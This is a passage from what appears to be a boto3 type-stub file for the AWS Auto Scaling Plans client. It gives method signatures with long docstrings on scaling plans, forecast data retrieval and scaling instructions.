* Spot Fleet request - The resource type is ``spot-fleet-request`` and the unique identifier is the Spot Fleet request ID. Example: ``spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE`` .
* DynamoDB table - The resource type is ``table`` and the unique identifier is the resource ID. Example: ``table/my-table`` .
* DynamoDB global secondary index - The resource type is ``index`` and the unique identifier is the resource ID. Example: ``table/my-table/index/my-table-index`` .
* Aurora DB cluster - The resource type is ``cluster`` and the unique identifier is the cluster name. Example: ``cluster:my-db-cluster`` .
- **ScalableDimension** *(string) --*
The scalable dimension associated with the resource.
* ``autoscaling:autoScalingGroup:DesiredCapacity`` - The desired capacity of an Auto Scaling group.
* ``ecs:service:DesiredCount`` - The desired task count of an ECS service.
* ``ec2:spot-fleet-request:TargetCapacity`` - The target capacity of a Spot Fleet request.
* ``dynamodb:table:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB table.
* ``dynamodb:table:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB table.
* ``dynamodb:index:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB global secondary index.
* ``dynamodb:index:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB global secondary index.
* ``rds:cluster:ReadReplicaCount`` - The count of Aurora Replicas in an Aurora DB cluster. Available for Aurora MySQL-compatible edition and Aurora PostgreSQL-compatible edition.
- **MinCapacity** *(integer) --*
The minimum capacity of the resource.
- **MaxCapacity** *(integer) --*
The maximum capacity of the resource. The exception to this upper limit is if you specify a non-default setting for **PredictiveScalingMaxCapacityBehavior** .
- **TargetTrackingConfigurations** *(list) --*
The structure that defines new target tracking configurations (up to 10). Each of these structures includes a specific scaling metric and a target value for the metric, along with various parameters to use with dynamic scaling.
With predictive scaling and dynamic scaling, the resource scales based on the target tracking configuration that provides the largest capacity for both scale in and scale out.
Condition: The scaling metric must be unique across target tracking configurations.
- *(dict) --*
Describes a target tracking configuration to use with AWS Auto Scaling. Used with ScalingInstruction and ScalingPolicy .
- **PredefinedScalingMetricSpecification** *(dict) --*
A predefined metric. You can specify either a predefined metric or a customized metric.
- **PredefinedScalingMetricType** *(string) --*
The metric type. The ``ALBRequestCountPerTarget`` metric type applies only to Auto Scaling groups, Spot Fleet requests, and ECS services.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can't specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group, Spot Fleet request, or ECS service.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedScalingMetricSpecification** *(dict) --*
A customized metric. You can specify either a predefined metric or a customized metric.
- **MetricName** *(string) --*
The name of the metric.
- **Namespace** *(string) --*
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized scaling metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --*
The name of the dimension.
- **Value** *(string) --*
The value of the dimension.
- **Statistic** *(string) --*
The statistic of the metric.
- **Unit** *(string) --*
The unit of the metric.
- **TargetValue** *(float) --*
The target value for the metric. The range is 8.515920e-109 to 1.174271e+108 (Base 10) or 2e-360 to 2e360 (Base 2).
- **DisableScaleIn** *(boolean) --*
Indicates whether scale in by the target tracking scaling policy is disabled. If the value is ``true`` , scale in is disabled and the target tracking scaling policy doesn't remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking scaling policy can remove capacity from the scalable resource.
The default value is ``false`` .
- **ScaleOutCooldown** *(integer) --*
The amount of time, in seconds, after a scale-out activity completes before another scale-out activity can start. This value is not used if the scalable resource is an Auto Scaling group.
While the cooldown period is in effect, the capacity that has been added by the previous scale-out event that initiated the cooldown is calculated as part of the desired capacity for the next scale out. The intention is to continuously (but not excessively) scale out.
- **ScaleInCooldown** *(integer) --*
The amount of time, in seconds, after a scale in activity completes before another scale in activity can start. This value is not used if the scalable resource is an Auto Scaling group.
The cooldown period is used to block subsequent scale in requests until it has expired. The intention is to scale in conservatively to protect your application's availability. However, if another alarm triggers a scale-out policy during the cooldown period after a scale-in, AWS Auto Scaling scales out your scalable target immediately.
- **EstimatedInstanceWarmup** *(integer) --*
The estimated time, in seconds, until a newly launched instance can contribute to the CloudWatch metrics. This value is used only if the resource is an Auto Scaling group.
- **PredefinedLoadMetricSpecification** *(dict) --*
The predefined load metric to use for predictive scaling. This parameter or a **CustomizedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **PredefinedLoadMetricType** *(string) --*
The metric type.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can't specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedLoadMetricSpecification** *(dict) --*
The customized load metric to use for predictive scaling. This parameter or a **PredefinedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **MetricName** *(string) --*
The name of the metric.
- **Namespace** *(string) --*
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized load metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --*
The name of the dimension.
- **Value** *(string) --*
The value of the dimension.
- **Statistic** *(string) --*
The statistic of the metric. Currently, the value must always be ``Sum`` .
- **Unit** *(string) --*
The unit of the metric.
- **ScheduledActionBufferTime** *(integer) --*
The amount of time, in seconds, to buffer the run time of scheduled scaling actions when scaling out. For example, if the forecast says to add capacity at 10:00 AM, and the buffer time is 5 minutes, then the run time of the corresponding scheduled scaling action will be 9:55 AM. The intention is to give resources time to be provisioned. For example, it can take a few minutes to launch an EC2 instance. The actual amount of time required depends on several factors, such as the size of the instance and whether there are startup scripts to complete.
The value must be less than the forecast interval duration of 3600 seconds (60 minutes). The default is 300 seconds.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBehavior** *(string) --*
Defines the behavior that should be applied if the forecast capacity approaches or exceeds the maximum capacity specified for the resource. The default value is ``SetForecastCapacityToMaxCapacity`` .
The following are possible values:
* ``SetForecastCapacityToMaxCapacity`` - AWS Auto Scaling cannot scale resource capacity higher than the maximum capacity. The maximum capacity is enforced as a hard limit.
* ``SetMaxCapacityToForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity to equal but not exceed forecast capacity.
* ``SetMaxCapacityAboveForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity by a specified buffer value. The intention is to give the target tracking scaling policy extra capacity if unexpected traffic occurs.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBuffer** *(integer) --*
The size of the capacity buffer to use when the forecast capacity is close to or exceeds the maximum capacity. The value is specified as a percentage relative to the forecast capacity. For example, if the buffer is 10, this means a 10 percent buffer, such that if the forecast capacity is 50, and the maximum capacity is 40, then the effective maximum capacity is 55.
Only valid when configuring predictive scaling. Required if the **PredictiveScalingMaxCapacityBehavior** is set to ``SetMaxCapacityAboveForecastCapacity`` , and cannot be used otherwise.
The range is 1-100.
- **PredictiveScalingMode** *(string) --*
The predictive scaling mode. The default value is ``ForecastAndScale`` . Otherwise, AWS Auto Scaling forecasts capacity but does not create any scheduled scaling actions based on the capacity forecast.
- **ScalingPolicyUpdateBehavior** *(string) --*
Controls whether a resource's externally created scaling policies are kept or replaced.
The default value is ``KeepExternalPolicies`` . If the parameter is set to ``ReplaceExternalPolicies`` , any scaling policies that are external to AWS Auto Scaling are deleted and new target tracking scaling policies created.
Only valid when configuring dynamic scaling.
Condition: The number of existing policies to be replaced must be less than or equal to 50. If there are more than 50 policies to be replaced, AWS Auto Scaling keeps all existing policies and does not create new ones.
- **DisableDynamicScaling** *(boolean) --*
Controls whether dynamic scaling by AWS Auto Scaling is disabled. When dynamic scaling is enabled, AWS Auto Scaling creates target tracking scaling policies based on the specified target tracking configurations.
The default is enabled (``false`` ).
- **StatusCode** *(string) --*
The status of the scaling plan.
* ``Active`` - The scaling plan is active.
* ``ActiveWithProblems`` - The scaling plan is active, but the scaling configuration for one or more resources could not be applied.
* ``CreationInProgress`` - The scaling plan is being created.
* ``CreationFailed`` - The scaling plan could not be created.
* ``DeletionInProgress`` - The scaling plan is being deleted.
* ``DeletionFailed`` - The scaling plan could not be deleted.
* ``UpdateInProgress`` - The scaling plan is being updated.
* ``UpdateFailed`` - The scaling plan could not be updated.
- **StatusMessage** *(string) --*
A simple message about the current status of the scaling plan.
- **StatusStartTime** *(datetime) --*
The Unix time stamp when the scaling plan entered the current status.
- **CreationTime** *(datetime) --*
The Unix time stamp when the scaling plan was created.
- **NextToken** *(string) --*
The token required to get the next set of results. This value is ``null`` if there are no more results to return.
:type ScalingPlanNames: list
:param ScalingPlanNames:
The names of the scaling plans (up to 10). If you specify application sources, you cannot specify scaling plan names.
- *(string) --*
:type ScalingPlanVersion: integer
:param ScalingPlanVersion:
The version number of the scaling plan. If you specify a scaling plan version, you must also specify a scaling plan name.
:type ApplicationSources: list
:param ApplicationSources:
The sources for the applications (up to 10). If you specify scaling plan names, you cannot specify application sources.
- *(dict) --*
Represents an application source.
- **CloudFormationStackARN** *(string) --*
The Amazon Resource Name (ARN) of a AWS CloudFormation stack.
- **TagFilters** *(list) --*
A set of tags (up to 50).
- *(dict) --*
Represents a tag.
- **Key** *(string) --*
The tag key.
- **Values** *(list) --*
The tag values (0 to 20).
- *(string) --*
:type MaxResults: integer
:param MaxResults:
The maximum number of scalable resources to return. This value can be between 1 and 50. The default value is 50.
:type NextToken: string
:param NextToken:
The token for the next set of results.
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_scaling_plan_resource_forecast_data(self, ScalingPlanName: str, ScalingPlanVersion: int, ServiceNamespace: str, ResourceId: str, ScalableDimension: str, ForecastDataType: str, StartTime: datetime, EndTime: datetime) -> Dict:
"""
Retrieves the forecast data for a scalable resource.
Capacity forecasts are represented as predicted values, or data points, that are calculated using historical data points from a specified CloudWatch load metric. Data points are available for up to 56 days.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/GetScalingPlanResourceForecastData>`_
**Request Syntax**
::
response = client.get_scaling_plan_resource_forecast_data(
ScalingPlanName='string',
ScalingPlanVersion=123,
ServiceNamespace='autoscaling'|'ecs'|'ec2'|'rds'|'dynamodb',
ResourceId='string',
ScalableDimension='autoscaling:autoScalingGroup:DesiredCapacity'|'ecs:service:DesiredCount'|'ec2:spot-fleet-request:TargetCapacity'|'rds:cluster:ReadReplicaCount'|'dynamodb:table:ReadCapacityUnits'|'dynamodb:table:WriteCapacityUnits'|'dynamodb:index:ReadCapacityUnits'|'dynamodb:index:WriteCapacityUnits',
ForecastDataType='CapacityForecast'|'LoadForecast'|'ScheduledActionMinCapacity'|'ScheduledActionMaxCapacity',
StartTime=datetime(2015, 1, 1),
EndTime=datetime(2015, 1, 1)
)
**Response Syntax**
::
{
'Datapoints': [
{
'Timestamp': datetime(2015, 1, 1),
'Value': 123.0
},
]
}
**Response Structure**
- *(dict) --*
- **Datapoints** *(list) --*
The data points to return.
- *(dict) --*
Represents a single value in the forecast data used for predictive scaling.
- **Timestamp** *(datetime) --*
The time stamp for the data point in UTC format.
- **Value** *(float) --*
The value of the data point.
:type ScalingPlanName: string
:param ScalingPlanName: **[REQUIRED]**
The name of the scaling plan.
:type ScalingPlanVersion: integer
:param ScalingPlanVersion: **[REQUIRED]**
The version number of the scaling plan.
:type ServiceNamespace: string
:param ServiceNamespace: **[REQUIRED]**
The namespace of the AWS service.
:type ResourceId: string
:param ResourceId: **[REQUIRED]**
The ID of the resource. This string consists of the resource type and unique identifier.
* Auto Scaling group - The resource type is ``autoScalingGroup`` and the unique identifier is the name of the Auto Scaling group. Example: ``autoScalingGroup/my-asg`` .
* ECS service - The resource type is ``service`` and the unique identifier is the cluster name and service name. Example: ``service/default/sample-webapp`` .
* Spot Fleet request - The resource type is ``spot-fleet-request`` and the unique identifier is the Spot Fleet request ID. Example: ``spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE`` .
* DynamoDB table - The resource type is ``table`` and the unique identifier is the resource ID. Example: ``table/my-table`` .
* DynamoDB global secondary index - The resource type is ``index`` and the unique identifier is the resource ID. Example: ``table/my-table/index/my-table-index`` .
* Aurora DB cluster - The resource type is ``cluster`` and the unique identifier is the cluster name. Example: ``cluster:my-db-cluster`` .
:type ScalableDimension: string
:param ScalableDimension: **[REQUIRED]**
The scalable dimension for the resource.
:type ForecastDataType: string
:param ForecastDataType: **[REQUIRED]**
The type of forecast data to get.
* ``LoadForecast`` : The load metric forecast.
* ``CapacityForecast`` : The capacity forecast.
* ``ScheduledActionMinCapacity`` : The minimum capacity for each scheduled scaling action. This data is calculated as the larger of two values: the capacity forecast or the minimum capacity in the scaling instruction.
* ``ScheduledActionMaxCapacity`` : The maximum capacity for each scheduled scaling action. The calculation used is determined by the predictive scaling maximum capacity behavior setting in the scaling instruction.
:type StartTime: datetime
:param StartTime: **[REQUIRED]**
The inclusive start time of the time range for the forecast data to get. The date and time can be at most 56 days before the current date and time.
:type EndTime: datetime
:param EndTime: **[REQUIRED]**
The exclusive end time of the time range for the forecast data to get. The maximum time duration between the start and end time is seven days.
Although this parameter can accept a date and time that is more than two days in the future, the availability of forecast data has limits. AWS Auto Scaling only issues forecasts for periods of two days in advance.
:rtype: dict
:returns:
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def update_scaling_plan(self, ScalingPlanName: str, ScalingPlanVersion: int, ApplicationSource: Dict = None, ScalingInstructions: List = None) -> Dict:
"""
Updates the specified scaling plan.
You cannot update a scaling plan if it is in the process of being created, updated, or deleted.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/UpdateScalingPlan>`_
**Request Syntax**
::
response = client.update_scaling_plan(
ScalingPlanName='string',
ScalingPlanVersion=123,
ApplicationSource={
'CloudFormationStackARN': 'string',
'TagFilters': [
{
'Key': 'string',
'Values': [
'string',
]
},
]
},
ScalingInstructions=[
{
'ServiceNamespace': 'autoscaling'|'ecs'|'ec2'|'rds'|'dynamodb',
'ResourceId': 'string',
'ScalableDimension': 'autoscaling:autoScalingGroup:DesiredCapacity'|'ecs:service:DesiredCount'|'ec2:spot-fleet-request:TargetCapacity'|'rds:cluster:ReadReplicaCount'|'dynamodb:table:ReadCapacityUnits'|'dynamodb:table:WriteCapacityUnits'|'dynamodb:index:ReadCapacityUnits'|'dynamodb:index:WriteCapacityUnits',
'MinCapacity': 123,
'MaxCapacity': 123,
'TargetTrackingConfigurations': [
{
'PredefinedScalingMetricSpecification': {
'PredefinedScalingMetricType': 'ASGAverageCPUUtilization'|'ASGAverageNetworkIn'|'ASGAverageNetworkOut'|'DynamoDBReadCapacityUtilization'|'DynamoDBWriteCapacityUtilization'|'ECSServiceAverageCPUUtilization'|'ECSServiceAverageMemoryUtilization'|'ALBRequestCountPerTarget'|'RDSReaderAverageCPUUtilization'|'RDSReaderAverageDatabaseConnections'|'EC2SpotFleetRequestAverageCPUUtilization'|'EC2SpotFleetRequestAverageNetworkIn'|'EC2SpotFleetRequestAverageNetworkOut',
'ResourceLabel': 'string'
},
'CustomizedScalingMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'TargetValue': 123.0,
'DisableScaleIn': True|False,
'ScaleOutCooldown': 123,
'ScaleInCooldown': 123,
'EstimatedInstanceWarmup': 123
},
],
'PredefinedLoadMetricSpecification': {
'PredefinedLoadMetricType': 'ASGTotalCPUUtilization'|'ASGTotalNetworkIn'|'ASGTotalNetworkOut'|'ALBTargetGroupRequestCount',
'ResourceLabel': 'string'
},
'CustomizedLoadMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'ScheduledActionBufferTime': 123,
'PredictiveScalingMaxCapacityBehavior': 'SetForecastCapacityToMaxCapacity'|'SetMaxCapacityToForecastCapacity'|'SetMaxCapacityAboveForecastCapacity',
'PredictiveScalingMaxCapacityBuffer': 123,
'PredictiveScalingMode': 'ForecastAndScale'|'ForecastOnly',
'ScalingPolicyUpdateBehavior': 'KeepExternalPolicies'|'ReplaceExternalPolicies',
'DisableDynamicScaling': True|False
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ScalingPlanName: string
:param ScalingPlanName: **[REQUIRED]**
The name of the scaling plan.
:type ScalingPlanVersion: integer
:param ScalingPlanVersion: **[REQUIRED]**
The version number of the scaling plan.
:type ApplicationSource: dict
:param ApplicationSource:
A CloudFormation stack or set of tags.
- **CloudFormationStackARN** *(string) --*
The Amazon Resource Name (ARN) of a AWS CloudFormation stack.
- **TagFilters** *(list) --*
A set of tags (up to 50).
- *(dict) --*
Represents a tag.
- **Key** *(string) --*
The tag key.
- **Values** *(list) --*
The tag values (0 to 20).
- *(string) --*
:type ScalingInstructions: list
:param ScalingInstructions:
The scaling instructions.
- *(dict) --*
Describes a scaling instruction for a scalable resource.
The scaling instruction is used in combination with a scaling plan, which is a set of instructions for configuring dynamic scaling and predictive scaling for the scalable resources in your application. Each scaling instruction applies to one resource.
AWS Auto Scaling creates target tracking scaling policies based on the scaling instructions. Target tracking scaling policies adjust the capacity of your scalable resource as required to maintain resource utilization at the target value that you specified.
AWS Auto Scaling also configures predictive scaling for your Amazon EC2 Auto Scaling groups using a subset of parameters, including the load metric, the scaling metric, the target value for the scaling metric, the predictive scaling mode (forecast and scale or forecast only), and the desired behavior when the forecast capacity exceeds the maximum capacity of the resource. With predictive scaling, AWS Auto Scaling generates forecasts with traffic predictions for the two days ahead and schedules scaling actions that proactively add and remove resource capacity to match the forecast.
We recommend waiting a minimum of 24 hours after creating an Auto Scaling group to configure predictive scaling. At minimum, there must be 24 hours of historical data to generate a forecast.
For more information, see `Getting Started with AWS Auto Scaling <https://docs.aws.amazon.com/autoscaling/plans/userguide/auto-scaling-getting-started.html>`__ .
- **ServiceNamespace** *(string) --* **[REQUIRED]**
The namespace of the AWS service.
- **ResourceId** *(string) --* **[REQUIRED]**
The ID of the resource. This string consists of the resource type and unique identifier.
* Auto Scaling group - The resource type is ``autoScalingGroup`` and the unique identifier is the name of the Auto Scaling group. Example: ``autoScalingGroup/my-asg`` .
* ECS service - The resource type is ``service`` and the unique identifier is the cluster name and service name. Example: ``service/default/sample-webapp`` .
* Spot Fleet request - The resource type is ``spot-fleet-request`` and the unique identifier is the Spot Fleet request ID. Example: ``spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE`` .
* DynamoDB table - The resource type is ``table`` and the unique identifier is the resource ID. Example: ``table/my-table`` .
* DynamoDB global secondary index - The resource type is ``index`` and the unique identifier is the resource ID. Example: ``table/my-table/index/my-table-index`` .
* Aurora DB cluster - The resource type is ``cluster`` and the unique identifier is the cluster name. Example: ``cluster:my-db-cluster`` .
- **ScalableDimension** *(string) --* **[REQUIRED]**
The scalable dimension associated with the resource.
* ``autoscaling:autoScalingGroup:DesiredCapacity`` - The desired capacity of an Auto Scaling group.
* ``ecs:service:DesiredCount`` - The desired task count of an ECS service.
* ``ec2:spot-fleet-request:TargetCapacity`` - The target capacity of a Spot Fleet request.
* ``dynamodb:table:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB table.
* ``dynamodb:table:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB table.
* ``dynamodb:index:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB global secondary index.
* ``dynamodb:index:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB global secondary index.
* ``rds:cluster:ReadReplicaCount`` - The count of Aurora Replicas in an Aurora DB cluster. Available for Aurora MySQL-compatible edition and Aurora PostgreSQL-compatible edition.
- **MinCapacity** *(integer) --* **[REQUIRED]**
The minimum capacity of the resource.
- **MaxCapacity** *(integer) --* **[REQUIRED]**
The maximum capacity of the resource. The exception to this upper limit is if you specify a non-default setting for **PredictiveScalingMaxCapacityBehavior** .
- **TargetTrackingConfigurations** *(list) --* **[REQUIRED]**
The structure that defines new target tracking configurations (up to 10). Each of these structures includes a specific scaling metric and a target value for the metric, along with various parameters to use with dynamic scaling.
With predictive scaling and dynamic scaling, the resource scales based on the target tracking configuration that provides the largest capacity for both scale in and scale out.
Condition: The scaling metric must be unique across target tracking configurations.
- *(dict) --*
Describes a target tracking configuration to use with AWS Auto Scaling. Used with ScalingInstruction and ScalingPolicy .
- **PredefinedScalingMetricSpecification** *(dict) --*
A predefined metric. You can specify either a predefined metric or a customized metric.
- **PredefinedScalingMetricType** *(string) --* **[REQUIRED]**
The metric type. The ``ALBRequestCountPerTarget`` metric type applies only to Auto Scaling groups, Spot Fleet requests, and ECS services.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can\'t specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group, Spot Fleet request, or ECS service.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedScalingMetricSpecification** *(dict) --*
A customized metric. You can specify either a predefined metric or a customized metric.
- **MetricName** *(string) --* **[REQUIRED]**
The name of the metric.
- **Namespace** *(string) --* **[REQUIRED]**
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized scaling metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --* **[REQUIRED]**
The name of the dimension.
- **Value** *(string) --* **[REQUIRED]**
The value of the dimension.
- **Statistic** *(string) --* **[REQUIRED]**
The statistic of the metric.
- **Unit** *(string) --*
The unit of the metric.
- **TargetValue** *(float) --* **[REQUIRED]**
The target value for the metric. The range is 8.515920e-109 to 1.174271e+108 (Base 10) or 2e-360 to 2e360 (Base 2).
- **DisableScaleIn** *(boolean) --*
Indicates whether scale in by the target tracking scaling policy is disabled. If the value is ``true`` , scale in is disabled and the target tracking scaling policy doesn\'t remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking scaling policy can remove capacity from the scalable resource.
The default value is ``false`` .
- **ScaleOutCooldown** *(integer) --*
The amount of time, in seconds, after a scale-out activity completes before another scale-out activity can start. This value is not used if the scalable resource is an Auto Scaling group.
While the cooldown period is in effect, the capacity that has been added by the previous scale-out event that initiated the cooldown is calculated as part of the desired capacity for the next scale out. The intention is to continuously (but not excessively) scale out.
- **ScaleInCooldown** *(integer) --*
The amount of time, in seconds, after a scale in activity completes before another scale in activity can start. This value is not used if the scalable resource is an Auto Scaling group.
The cooldown period is used to block subsequent scale in requests until it has expired. The intention is to scale in conservatively to protect your application\'s availability. However, if another alarm triggers a scale-out policy during the cooldown period after a scale-in, AWS Auto Scaling scales out your scalable target immediately.
- **EstimatedInstanceWarmup** *(integer) --*
The estimated time, in seconds, until a newly launched instance can contribute to the CloudWatch metrics. This value is used only if the resource is an Auto Scaling group.
- **PredefinedLoadMetricSpecification** *(dict) --*
The predefined load metric to use for predictive scaling. This parameter or a **CustomizedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **PredefinedLoadMetricType** *(string) --* **[REQUIRED]**
The metric type.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can\'t specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedLoadMetricSpecification** *(dict) --*
The customized load metric to use for predictive scaling. This parameter or a **PredefinedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **MetricName** *(string) --* **[REQUIRED]**
The name of the metric.
- **Namespace** *(string) --* **[REQUIRED]**
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized load metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --* **[REQUIRED]**
The name of the dimension.
- **Value** *(string) --* **[REQUIRED]**
The value of the dimension.
- **Statistic** *(string) --* **[REQUIRED]**
The statistic of the metric. Currently, the value must always be ``Sum`` .
- **Unit** *(string) --*
The unit of the metric.
- **ScheduledActionBufferTime** *(integer) --*
The amount of time, in seconds, to buffer the run time of scheduled scaling actions when scaling out. For example, if the forecast says to add capacity at 10:00 AM, and the buffer time is 5 minutes, then the run time of the corresponding scheduled scaling action will be 9:55 AM. The intention is to give resources time to be provisioned. For example, it can take a few minutes to launch an EC2 instance. The actual amount of time required depends on several factors, such as the size of the instance and whether there are startup scripts to complete.
The value must be less than the forecast interval duration of 3600 seconds (60 minutes). The default is 300 seconds.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBehavior** *(string) --*
Defines the behavior that should be applied if the forecast capacity approaches or exceeds the maximum capacity specified for the resource. The default value is ``SetForecastCapacityToMaxCapacity`` .
The following are possible values:
* ``SetForecastCapacityToMaxCapacity`` - AWS Auto Scaling cannot scale resource capacity higher than the maximum capacity. The maximum capacity is enforced as a hard limit.
* ``SetMaxCapacityToForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity to equal but not exceed forecast capacity.
* ``SetMaxCapacityAboveForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity by a specified buffer value. The intention is to give the target tracking scaling policy extra capacity if unexpected traffic occurs.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBuffer** *(integer) --*
The size of the capacity buffer to use when the forecast capacity is close to or exceeds the maximum capacity. The value is specified as a percentage relative to the forecast capacity. For example, if the buffer is 10, this means a 10 percent buffer, such that if the forecast capacity is 50, and the maximum capacity is 40, then the effective maximum capacity is 55.
Only valid when configuring predictive scaling. Required if the **PredictiveScalingMaxCapacityBehavior** is set to ``SetMaxCapacityAboveForecastCapacity`` , and cannot be used otherwise.
The range is 1-100.
- **PredictiveScalingMode** *(string) --*
The predictive scaling mode. The default value is ``ForecastAndScale`` . Otherwise, AWS Auto Scaling forecasts capacity but does not create any scheduled scaling actions based on the capacity forecast.
- **ScalingPolicyUpdateBehavior** *(string) --*
Controls whether a resource\'s externally created scaling policies are kept or replaced.
The default value is ``KeepExternalPolicies`` . If the parameter is set to ``ReplaceExternalPolicies`` , any scaling policies that are external to AWS Auto Scaling are deleted and new target tracking scaling policies created.
Only valid when configuring dynamic scaling.
Condition: The number of existing policies to be replaced must be less than or equal to 50. If there are more than 50 policies to be replaced, AWS Auto Scaling keeps all existing policies and does not create new ones.
- **DisableDynamicScaling** *(boolean) --*
Controls whether dynamic scaling by AWS Auto Scaling is disabled. When dynamic scaling is enabled, AWS Auto Scaling creates target tracking scaling policies based on the specified target tracking configurations.
The default is enabled (``false`` ).
:rtype: dict
:returns:
"""
pass
